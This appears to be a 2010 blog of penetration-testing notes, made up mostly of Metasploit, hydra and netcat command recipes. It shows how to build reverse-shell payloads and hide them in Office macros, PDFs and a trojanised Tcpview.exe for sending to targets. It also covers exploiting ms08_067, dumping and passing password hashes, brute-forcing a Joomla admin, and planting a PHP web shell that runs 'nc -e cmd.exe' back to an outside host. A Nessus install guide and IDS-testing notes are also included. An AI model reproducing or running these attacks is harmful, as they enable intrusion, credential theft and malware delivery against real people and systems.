Tuesday, May 18, 2010

Client-side Attack by Using Evil MS-Office Apps (Excel or Word)

Step 1: Create your own payload

cd /pentest/exploits/framework3

./msfpayload windows/meterpreter/reverse_tcp LHOST=131.107.1.252 LPORT=443 X > /tmp/payload.exe

Step 2: Convert your newly created payload to VBA (Visual Basic for Application) script

cd /pentest/exploits/framework3/tools

./exe2vba.rb /tmp/payload.exe /tmp/payload.vba

Step 3: Copy and Paste the contents of the payload to your evil file

Open your evil file (Excel or Word). Select: Tools > Macro > Visual Basic Editor, paste the contents of your payload.vba, then save the file.

Step 4: Send the evil file to your client

Step 5: Wait for the reverse connection from the client

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit

Thursday, May 13, 2010

Autopwn = Ninja Script!

msf > db_driver sqlite3
msf > db_create pentest
msf > db_nmap -sS -p135,139,445 192.168.1.200
msf > db_hosts
msf > db_services
msf > db_autopwn -t -p -e -r

SMB Pass the Hash

Step 1:
Get the hashes from the target machine (eq. LON-DC1 = 192.168.1.200)
msf > use windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set RHOST 192.168.1.200
msf > set LHOST 192.168.1.252
msf > set LPORT 443
msf > set TARGET 7
msf > exploit

meterpreter > run hashdump


Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Step 2:
Copy the hash then pass the hash by using psexec

msf > use windows/smb/psexec
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set RHOST 192.168.1.110
msf > set LHOST 192.168.1.252
msf > set LPORT 6666
msf > set SMBUser Administrator
msf > set SMBPass 921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42
msf > exploit

Client-side Attack by Using Evil PDF

Step 1: Create your own payload

cd /pentest/exploits/framework3

./msfpayload windows/meterpreter/reverse_tcp LHOST=131.107.1.252 LPORT=443 X > /tmp/payload.exe


Step 2: Create an evil pdf

msf > use windows/fileformat/adobe_pdf_embedded_exe
msf > set PAYLOAD windows/metepreter/reverse_tcp
msf > set EXENAME /tmp/payload.exe
msf > set FILENAME /tmp/BestComputerGuide.pdf
msf > set INFILENAME /tmp/Report.pdf
msf > set OUTPUTPATH /tmp/
msf > exploit

Note:
EXENAME is your payload/shellcode
FILENAME is your evil pdf file
INFILENAME is your original pdf file
OUTPUTPATH is your output directory

Result: /tmp/BestComputerGuide.pdf

Step 3: Send the evil pdf file to your client

Step 4: Wait for the reverse connection from the client

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit

Wednesday, May 12, 2010

Fabrikam Website Pen-Test

Step 1:
Find the Admin password (Password Guessing, Brute Force or Dictionary attack).
Tools: hydra or brutus

Example:
hydra -v -L login.txt -P pass.txt -m /administrator/index.php www.fabrikam.com http-get

hydra -v -L login.txt -P pass.txt -m /administrator/index.php www.fabrikam.com http-get-form

Step 2:
Goto http://www.fabrikam.com/administrator/ and login with the Username and Password you've got from Step 1.

Download Joomla Extension (eq. GalleryXML = Photo Gallery) from:
http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/12504
Save it to any folder you want (eq. Z:\Tools\PHP Shell folder).

Step 3:
Extract com_galleryxml.zip to Z:\Tools\PHP Shell folder.

Step 4:
Edit the galleryxml.xml control file and put dshell.php (PHP Shell) in the admin section.

Step 5:
Copy dshell.php to com_galleryxml/admin folder.

Step 6:
Archive or zip the contents of com_galleryxml folder into com_galleryxml.zip.

Step 7:
Use the "Extension Manager -> Upload & Install", browse and upload com_galleryxml.zip file.

Step 8:
Launch the PHP Shell from:
http://www.fabrikam.com/administrator/components/com_galleryxml/dshell.php 

Step 9:
By using dshell.php functionality, upload nc.exe to the remote server.

Step 10:
From the Pen-Tester machine, type:
nc -v -l -p443

From dshell.php page, execute Netcat by typing:
nc -v 131.107.1.222 443 -d -e cmd.exe

If the connection was successful, you should get the command prompt on your machine.

References:
http://docs.joomla.org/How_you_reset_an_administrator_password%3F
http://forum.joomla.org/viewtopic.php?t=10985
http://community.contractwebdevelopment.com/joomla-how-reset-super-admin-password
http://www.dart-creations.com/joomla/joomla-tips-and-tricks/25-forgot-your-super-administrator-password.html

Tuesday, May 11, 2010

My Sample Report for VA & PT

Here is my sample report which can be used for Vulnerability Analysis and Pen-Test.

Download Sample Report (VA-PT)

Monday, May 10, 2010

Download External Meterpreter Scripts and Tool

ifconfig eth1 up
ifconfig eth1 192.168.1.x/24
route add default gw 192.168.1.x

cd /pentest/exploits/framework3/scripts/meterpreter


wget http://www.darkoperator.com/meterpreter/disable_audit.rb
wget http://www.room362.com/scripts-and-programs/metasploit/deploymsf.rb

cd /pentest/exploits/framework3/plugins
wget http://www.room362.com/scripts-and-programs/metasploit/mini-3.3-dev.exe

Testing IDS with Encoded Payload

Step 1: On TEST-BT4, create an Encoded EXE Payload

./msfpayload windows/shell_reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -t exe -o /tmp/payload.exe

Step 2: Copy the newly created Encoded EXE Payload to DEN-WEB2

Step 3: On TEST-BT4, launch Netcat in Listening Mode

nc -v -l -p 443
or
cd /pentest/exploits/framework3
./msfconsole

msf > use multi/handler
msf > set PAYLOAD windows/shell_reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit

Step 4: ON DEN-WEB2, launch the Encoded EXE Payload (payload.exe)

You should see, a reverse connection from DEN-WEB2 to TEST-BT4

Advanced Topic: Embedding Legitimate Program with Encoded Payload (Reverse TCP Shell Backdoor)

Legitimate: Tcpview.exe
Backdoor: Tcpview2.exe

./msfpayload windows/shell/reverse_tcp LHOST=131.107.1.252 LPORT=443 R | ./msfencode -t exe -x /tmp/Tcpview.exe -o /tmp/Tcpview2.exe

Testing IDS with Sample Attacks

Port Scanning

Attacks:
nmap -sS 131.107.1.254
nmap -sU 131.107.1.254
nmap -sT 131.107.1.254

Snort: SNMP AgentX/tcp request -or- SNMP request tcp
Category: Attempted Information Leak

IIS Unicode Directory Traversal Exploit Test

Attack:
http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
press Enter
press Enter

Snort: (http_inspect) DOUBLE DECODING ATTACK
Category: unclassified

Apache Directory Access Test

Attack:
http://131.107.1.254/.htaccess
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/.htaccess
press Enter
press Enter

Snort: WEB-MISC .htaccess access
Category: attempted-recon

Attack:
http://131.107.1.254/robots.txt
or
nc -v 131.107.1.254 80
GET http://131.107.1.254/robots.txt
press Enter
press Enter

Snort: WEB-MISC robots.txt access
Category: web-application-activity

Ping Flood (Simple DoS Attack)

Attack:
ping -l 65000 131.107.1.254 (Windows)
or
ping -s 65000 131.107.1.254 (Linux)

Snort: ICMP L3retriever Ping
Category: attempted-recon

IDS Evasion Attack

Attack:
nmap -sS -PN -p80,443 -T1 131.107.1.254

Installing Nessus on BackTrack and Ubuntu Desktop

Step 1: Download from http://www.nessus.org and Install Nessus

Filename: Nessus-4.2.2-ubuntu810_i386.deb
Save in /tmp/ directory

Installing Nessus with Debian Package Manager

cd /tmp
dpkg -i Nessus-4.2.2-ubuntu810_i386.deb

Step 2: Add Nessus User

cd /opt/nessus/sbin
./nessus-adduser

Step 3: Register Nessus and Download All Plugins

Visit http://www.nessus.org/plugins/?view=homefeed
Register with your email address.
Open your email and get the registration/serial number.

cd /opt/nessus/bin
./nessus-fetch --register serial_number

Example:

./nessus-fetch --register 2B92-597B-2D44-C737-2309

Step 4: Launch Nessus Server and Apply All Plugins

cd /opt/nessus/sbin
./nessus-service

or

/etc/init.d/nessusd start

Step 5: Launch Nessus Client

https://localhost:8834/

Step 6: Update Plugins

cd /opt/nessus/sbin
./nessus-update-plugins

Nessus Plugins located at: /opt/nessus/lib/nessus/plugins